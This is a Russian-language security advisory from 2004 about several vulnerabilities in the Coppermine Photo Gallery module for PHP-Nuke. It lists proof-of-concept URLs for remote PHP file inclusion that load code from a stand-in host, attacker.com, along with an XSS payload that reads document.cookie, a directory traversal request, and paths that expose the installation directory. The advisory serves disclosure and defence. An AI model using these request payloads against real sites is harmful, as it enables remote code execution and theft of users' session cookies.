Security Lab

Несколько уязвимостей в Coppermine Photo Gallery

Дата публикации:02.05.2004
Дата изменения:17.10.2006
Всего просмотров:7331
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Coppermine Photo Gallery Module for phpNuke/postNuke 1.x
Уязвимые версии: Coppermine Photo Gallery 1.2.2b, 1.2.0 RC4

Описание: Несколько уязвимостей обнаружено в Coppermine Photo Gallery. Удаленный пользователь может выполнить произвольный PHP код на целевой системе, выполнить XSS нападение и определить инсталляционный путь.

1 PHP including: 

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://at tacker.com
http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com
2. Раскрытие инсталляционного пути: 
 http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
ht tp://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php
3. XSS: 
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=fo obar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями): 
 http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..
Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения.

URL производителя:http://coppermine.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke]